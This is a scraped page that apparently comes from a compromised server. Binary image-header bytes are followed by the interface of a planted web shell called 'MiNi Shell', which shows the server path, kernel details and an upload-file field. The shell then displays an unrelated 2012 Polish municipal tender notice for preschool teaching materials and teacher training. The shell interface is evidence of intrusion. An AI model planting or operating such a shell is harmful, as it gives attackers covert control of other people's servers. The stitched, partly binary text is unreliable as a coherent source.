JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/228309-N-2012.html

<p class="kh_header"><b>Kamienica Polska: Dostawa materiałów i pomocy dydaktycznych wraz z realizacją usługi szkoleniowej polegającej na zorganizowaniu i przeprowadzeniu szkolenia w ramach programu edukacyjnego dla dzieci w wieku od trzech do sześciu lat.</b><br>
<b>Numer ogłoszenia: 228309 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Kamienica Polska , ul. M. Konopnickiej 12, 42-260 Kamienica Polska, woj. śląskie, tel. 034 3273338 w. 33, 3273524, faks 034 3273149.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kamienicapolska.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów i pomocy dydaktycznych wraz z realizacją usługi szkoleniowej polegającej na zorganizowaniu i przeprowadzeniu szkolenia w ramach programu edukacyjnego dla dzieci w wieku od trzech do sześciu lat..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów i pomocy dydaktycznych wraz z realizacją usługi szkoleniowej dla nauczycieli polegającej na zorganizowaniu i przeprowadzeniu szkolenia w ramach  programu edukacyjnego dla dzieci, posiadającego co najmniej trzy moduły realizujące różne treści na trzech poziomach zaawansowania: dla dzieci 3-4 letnich, 5 letnich i 6 letnich. Przedmiot zamówienia realizowany jest w ramach trzech projektów: nr WND-POKL.09.05.00-24-523_11 pn. Poszukiwacze przygód, nr WND-POKL.09.05.00-24-585_11 pn. Wesołe przedszkolaki, nr WND-POKL.09.05.00-24-529_11 pn. Zaczarowane przedszkole.
W/w przedmiot zamówienia jest finansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.5 Oddolne inicjatywy edukacyjne na obszarach wiejskich.
Kod CPV: 39.16.21.00-6 pomoce dydaktyczne, 39.16.21.10-9 sprzęt dydaktyczny. 80.50.00.00-9 - usługi szkoleniowe.
Adresaci szkolenia: 8 - osobowa grupa nauczycieli.
Cel podstawowy: Celem szkolenia jest przygotowanie nauczycieli do prowadzenia zajęć z dziećmi tj. wyposażenie ich w wiadomości z zakresu nowoczesnych metod pracy z dzieckiem w tym, podstaw rozwoju emocjonalnego dzieci w wieku przedszkolnym, wzrostu poziomu poczucia własnej wartości i poczucia pewności siebie jak również umiejętności rozpoznawania własnych uczuć i emocji u dzieci, treningu pamięci i koncentracji, nauki czytania metodą globalną Glenna Domana. Ponadto szkolenie ma obejmować szczegółowe omówienie metodyki prowadzenia zajęć z dziećmi ze szczególnym zwróceniem  uwagi na eksperymenty naukowe wykonywane w programie. 
Ogółem liczba szkoleń wynosi: 3, z tym, że dwa szkolenia obejmują pracę na poziomie zaawansowanym i treści szkolenia mają obejmować tematykę:
1. Uwarunkowania genetyczne a wychowanie.
2. Prawdy i mity na temat genialności.
3. Jak kształtować inteligencję.
4. Teoria inteligencji wielorakich i wynikające z niej przesłania dla rodziców.
5. Analiza transakcyjna:
- deficyt uwagi,
- bierna i otwarta agresja,
- skrypty poboru energii i wymuszania uwagi przez dzieci w przedszkolu,
- trójkąt dramatyczny - klasyczny schemat skryptowy.
6. Co to są emocje:
- jakość życia zależy od jakości emocji, które przeżywamy,
- procedura - praktyczna pomoc w pacy z emocjami,
- bajka somatoterapeutyczna - procedura pracy z lękiem dla Dziecka.
7. Zabawa - rola i znaczenie zabawy w kształtowaniu gotowości szkolnej u dzieci przedszkolnych.
8. Zabawy fundamentalne - cel i zasady działania programu.
9. Zabawy rozwijające inteligencję językową.
10. Zabawy z liczbami.
11. Zabawy rozwijające inteligencję ruchową.
12. Zabawy rozwijające inteligencję muzyczną.
13. Zabawy rozwijające kreatywność i wyobraźnię.
14. Praktyczny warsztat z wykorzystaniem pomocy dydaktycznych.
15. Przegląd skryptów trenerskich.
16. Omówienie i realizacja eksperymentów z programu edukacyjnegoi jedno na poziomie podstawowym 12 godzin - 2 dni po 6 godzin.
Z następującej tematyki:
Dzień pierwszy:
1. Cele i założenia Programu Edukacyjnego.
2. Fenomenologia mózgu ludzkiego.
3. Niezwykłe możliwości uczenia się małych dzieci.
4. Czytanie.
5. Co to jest czytanie.
6. Społeczeństwo Wiedzy i czytanie w XXI wieku.
7. Społeczeństwo w Erze Informacji.
8. Słowo pisane - podstawowy nośnik informacji.
9. Czy czytanie może być funkcją, rozwijającą się od urodzenia?
10. Odzwierciedlenie otoczenia w postaci reprezentacji semantycznych i syntaktycznych w mózgu małego dziecka.
11. Jak małe dziecko uczy się czytać - naturalne czytanie.
12. Błędy popełniane w szkole, które są źródłem problemów z czytaniem.
13. Dlaczego TRZEBA zacząć naukę czytania już w Przedszkolu.
14. Warsztat podnoszący sprawność czytania dla nauczycieli.
15. Fizjologia pracy oka podczas czytania.
16. Metody czytania dzieciom.
17. Realizacja Programu Edukacyjnego:
- omówienie materiałów trenerskich,
- rozpisanie ważnych elementów zajęć,
- kąpiel wyrazowa, wprowadzanie tablic z wyrazami - zasady ekspozycji,
- zabawy utrwalające wyrazy na zajęciach,
18. Gry utrwalające dla rodziców.
Dzień drugi:
1. Wzorce Myślenia i indywidualne style poznawcze:
- fizjologia procesu uczenia się,
- schemat obiegu informacji w mózgu,
- mózg, ciało i informacja (percepcja),
- zmysły i ciało w procesie uczenia się dzieci,
- wzorce myślenia w relacjach (rodzic - dziecko; nauczyciel - dziecko),
2. Problemy z czytaniem, pisaniem i ortografią w świetle Indywidualnych Wzorców Myślenia:
- 6 Indywidualnych Wzorców Myślenia,
- skłonności do problemów w szkole, w zależności od Wzorca Myślenia którym posługuje się dziecko,
- metody radzenia sobie z problemami poprzez aktywizację Indywidualnego Wzorca Myślenia.
3. Cykle życia:
- inspiracja,
- kryzys,
- stabilizacja.
4. Kary i nagrody w procesie wychowania dziecka.
5. Potrzeba dotyku:
- zaspokajanie podstawowych potrzeb dziecka poprzez dotyk i ruch. Metoda Weroniki Sherborne,
- metoda Weroniki Sherborne jako sposób na likwidowanie napięcia i stresu u dziecka i rodzica,
- rozruch i ruch rozwijający w Programie.
6. Warsztat z dramy: co to jest drama, etapy dramy, praktyczny warsztat, metody realizacji dramy w Programie.
7. Rola pacynki w realizacji Programu.
8. List i eksperymenty:
- rola eksperymentu w Programie,
- listy i zaangażowanie dzieci w zadania,
- listy i wprowadzenie dzieci w rolę.
9. Plastrony - teoria i praktyka.
10. Jak wprowadzamy książeczki dla dzieci.
11. Informacje, których potrzebują rodzice.
12. Przegląd skryptów trenerskich.
13. Omówienie i realizacja eksperymentów z programu edukacyjnego.
Jedną godzinę szkolenia Zamawiający rozumie jako godzinę zegarową tj. 60 minut: w tym godzina edukacyjna = 45 minut i 15 minut przerwy. 
Zamówienie obejmuje również warsztaty dla 147 rodziców w wymiarze 6 spotkań po 2 godziny, oraz konsultacje metodyczne tj. 2 spotkania superwizyjne w czasie realizacji zajęć z dziećmi mające na celu wsparcie metodyczne nauczycieli. Spotkania superwizyjne obywać się powinny raz na dwa miesiące w każdej z 8 grup w wymiarze 1 godziny lekcyjnej. Ponadto wsparcie metodyczne ma obejmować codzienną możliwość kontaktu mailowego i telefonicznego nauczycieli z metodykiem.
Wykonawca zobowiązany jest zabezpieczyć słuchaczom dostęp do przygotowanych materiałów dydaktycznych wykorzystanych w szkoleniu :
1.	dla nauczycieli: 
- kompleksowe scenariusze prowadzenia zajęć,
- skrypt zawierający zagadnienia teoretyczne ze szkolenia, 
- wzorcowy zestaw materiałów taki jak w przypadku dzieci( bez teczki),
- wzory testów wiedzy dla każdego nauczyciela jeden wzorcowy odpowiedni do grupy wiekowej w jakiej będzie prowadzić zajęcia, 
- dostęp do interaktywnej internetowej platformy treningowej. Do wykorzystania w indywidualnej pracy jak i do prowadzenia zajęć w formie e-lekcji, z możliwością tworzenia przez szkoleniowca statystyk zbiorczych dokumentujących postępy uczestników w grupie. Ćwiczenia czytania, gry i zabawy usprawniające zapamiętywanie i koncentrację, dostępne na platformie mają zawierać treści uzupełniające do tematyki zajęć oraz dawać możliwość utrwalania dokładnie tych samych wyrazów i pojęć, które są zawarte w książeczkach dla dzieci, 
- wykaz materiałów, pomocy edukacyjnych i dydaktycznych, przyrządów i materiałów do eksperymentów ze szczegółowym rozpisaniem potrzeb na poszczególne zajęcia 
2. dla rodziców - zestawy materiałów do warsztatów, materiały obejmują dwa dziesięciostronicowe skrypty oprawione na trwałe, opisujące zagadnienia omawiane w trakcie warsztatów: pierwszy warsztat jest zatytułowany: Karać czy nagradzać, przekazane wtedy zostaną informacje na temat psychologii wychowawczej, z naciskiem na zagadnienia komunikacji  z dzieckiem w oparciu o zagadnienia psychologiczne: asertywność, analizę transakcyjną i porozumienie bez przemocy. Drugi warsztat nosi tytuł: Baw się i ucz - rodzice poznają zasady i metody rozwoju dziecka poprzez zabawę, poruszone zostaną tu zagadnienia rozwoju inteligencji wielorakich i wskazane pomoce dydaktyczne oraz praktyczne ćwiczenia, kluczowe dla rozwoju dziecka. Warsztaty stanowią kontynuację i rozwinięcie zagadnień które rodzice poznali w trakcie realizacji pierwszych projektów unijnych. Rodzice którzy nie uczestniczyli w poprzedniej edycji warsztatów mają mieć możliwość uczestniczenia w warsztatach w pt.: Genialny umysł dziecka oraz Indywidualne wzorce myślenia
3. dla każdego dziecka:
- 10 kolorowych 16 - stronicowych książeczek wydanych na papierze offsetowym gramatura co najmniej 70 g_m2, w kredowych okładkach o gramaturze co najmniej150g_m2 z oznaczeniem w systemie ISBN lub innym równoważnym znormalizowanym systemie oznaczania książek, zawierających wierszowaną treść zilustrowaną obrazkami. Treści i wyrazy zawarte w książeczkach mają zawierać dokładnie te same wyrazy co pozostałe pomoce dydaktyczne zarówno do pracy dla dzieci jak i dla nauczyciela w przedszkolu, ponadto mają stanowić spójną całość z pozostałymi elementami wykorzystanymi do realizacji programu edukacyjnego
- 60 kolorowych formularzy które wspomagają naukę czytania i pisania, zawierających treści spójne z książeczkami i programem edukacyjnym drukowane na papierze co najmniej 80 g_m2,
- 10 zestawów kart do pracy w domu, z kolorowym nadrukiem, karty wydane na papierze stompack o gramaturze co najmniej 250 g_m2, papier jednostronnie powlekany, w układzie, który pozwala na ich pocięcie i stworzenie 12 kart do gier w tym: Czarny Piotruś, Bingo. Każdy zestaw kart ma zawierać w treści wyrazy takie jak w zastosowane książeczkach, przy czym jeden zestaw kart służy do utrwalenia wyrazów z jednej książeczki. Ponadto każdy zestaw ma zawierać graficzne znaki i symbole pozwalające na stymulację matematyczną. Każdy z 10 zestawów powinien się składać z co najmniej czterech kart.
- formularze i zestawy kart mają posiadać przynajmniej jedno wspólne oznaczenie ISBN lub innego równoważnego znormalizowanego systemu oznaczania książek,
- kolorowa teczka wielkości co najmniej A4 wykonana z tektury introligatorskiej o gramaturze 1200 g_m2 oklejona dwustronnie papierem kredowym foliowanym o gramaturze 135 g_m2 z plastikową rączką pozwalającą na jej przenoszenie, zamykana na przylepce, 
- zestawy plastyczne zawierające materiały plastyczne pozwalające na realizację prac plastycznych przewidzianych w scenariuszach zajęć m.in.: plastelina do wykorzystania na każdych zajęciach (kinestetyczna nauka wyrazów), glina, kredki pastelowe, kredki akwarelowe, farby plakatowe, farby akwarelowe, kleje, brokaty, papier kolorowy, blok techniczny, brystole, bibuła karbowana i gładka, blok z brystolem kolorowym, duże arkusze szarego papieru, piórka itp. materiały mają spełniać założenia, że dzieci mają się uczyć w sposób wykorzystujący różnorodne formy aktywizacji m.in. przez twórczość.
Do pracy dla nauczyciela dla każdej grupy zajęciowej (8 zestawów):
1. Zestaw  nauczycielski do prowadzenia zajęć. W skład zestawu wchodzi:
- 300 kolorowych kartonowych (gramatura co najmniej 200 g_m2) tablic z wyrazami,
- 70 kolorowych kartonowych (gramatura co najmniej 200 g_m2) tablic obrazujących omawiane zjawiska,
- 150 plastronów do zabawy z wyrazami, zawierających wyrazy takie jak w książeczkach z zestawu dla dzieci (gramatura co najmniej 70 g/m2),
- 100 tablic z literkami z całego alfabetu odpowiednich do wycięcia gramatura co najmniej 70 g_m2
Zestawy mają być komplementarne z programem i przekazywać w sposób spójny treści zawarte w programach dopasowanych do przedziałów wiekowych.
2. Zestaw naczyń i pomocy laboratoryjnych obejmujący m.in. takie przedmioty jak:
- szkło laboratoryjne - probówki, menzurki itp., 
- termometry, lupy, strzykawki, spławik, kompas, wata, gaza
Każdy zestaw ma umożliwiać przeprowadzenie eksperymentów naukowych w odpowiedniej grupie wiekowej
3. Zestaw odczynników chemicznych i substancji do eksperymentów obejmuje m.in:
- substancje chemiczne,
- artykuły spożywcze,
- nasiona.
Zestawy odczynników są dopasowane do poszczególnych programów. Odczynników używane na zajęciach mają nie zagrażać życiu i zdrowiu dzieci.
4. Zestaw atlasów, encyklopedii i książek - służący do zobrazowania zjawisk omawianych na zajęciach, i budowania kultury słownej wśród najmłodszych. Zestaw ma też obejmować pozycje z zakresu psychologii. 
5. Mikroskop optyczny o powiększeniu do 640x, wys. 27 cm, funkcjonujący na baterie AA w ilości 2 zestawów. W skład zestawu powinny wchodzić:
- okular 10x 16x,
- mikrowylęgarnia,
- przyrząd do ciecia preparatów 
- 2 szkiełka z 6 preparatami 
- 4 fiolki 
- 2 menzurki 10 ml 
- 12 szkiełek podstawowych 
- 12 szkiełek nakrywkowych 
- lupa o powiększeniu 3x 6x 
- szalka Petriego ze szkłem powiększającym 
- 12 etykiet do znakowania preparatów,
- pęseta 
- igła 
- szpatułka,
- mieszadełko,
- skalpel 
- nożyczki,
- pipetka,
- pojemnik na akcesoria,
- instrukcja,
- zestaw 4 baterii AA do ładowania i odpowiednie do nich urządzenie do ładowania baterii.
Zastosowany program edukacyjny w celu stwierdzenia jego zgodności z przedszkolną podstawą programową ma posiadać do wglądu szczegółowo rozpisane treści programowe z określeniem tematów, celów głównych, aktywności i działalności dziecka, a także celów operacyjnych i zajęć ruchowych w programie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.00-9, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności określonych przedmiotem zamówienia. Ocena spełniania tego warunku nastąpi na podstawie odpisu z właściwego rejestru, oświadczenia o braku podstaw do wykluczenia stanowiącego załącznik nr 3 do specyfikacji, zaświadczenia właściwego naczelnika urzędu skarbowego oraz zaświadczenia właściwego oddziału ZUS lub KRUS.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie związane z przedmiotowym zamówieniem. Wykonawca winien przedstawić wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 (jednej) dostawy materiałów i pomocy związanych z przeprowadzeniem usługi grupowego szkolenia dla nauczycieli oraz co najmniej 1 (jednej) usługi obejmującej szkolenie grupowe w zakresie przygotowania nauczycieli do prowadzenia zajęć z dziećmi będące przedmiotem zamówienia lub tożsame swoim tematem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie. Wykonawca winien udokumentować, że wykonana dostawa jest powiązana z usługą szkoleniową. Ocena spełniania tego warunku nastąpi na podstawie wykazu wykonanych dostaw i usług stanowiący załącznik nr 4 do specyfikacji i dokumentów potwierdzających należyte wykonanie usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. Zamawiający w tym zakresie nie stawia szczegółowego warunku. Ocena spełniania tego warunku nastąpi na podstawie oświadczenia o spełnianiu warunków stanowiący załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia. Wykonawca winien dysponować osobami zdolnymi do prowadzenia szkolenia, które posiadają wykształcenie wyższe, co najmniej 2 letnie doświadczenie zawodowe związane z tematyką szkolenia i przeprowadziły nie mniej niż2 szkolenia grupowe w zakresie prowadzonej przez siebie tematyki zajęć, wskazanej przez Wykonawcę. Ocena spełniania warunku nastąpi na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług stanowiącego załącznik nr 5 do specyfikacji oraz oświadczenia potwierdzającego, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający w tym zakresie nie stawia szczegółowego warunku. Ocena spełniania tego warunku nastąpi na podstawie oświadczenia o spełnianiu warunków stanowiący załącznik nr 1 do specyfikacji.
Ocena spełniania warunków będzie dokonywana na podstawie złożonych dokumentów, wymienionych w SIWZ, metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
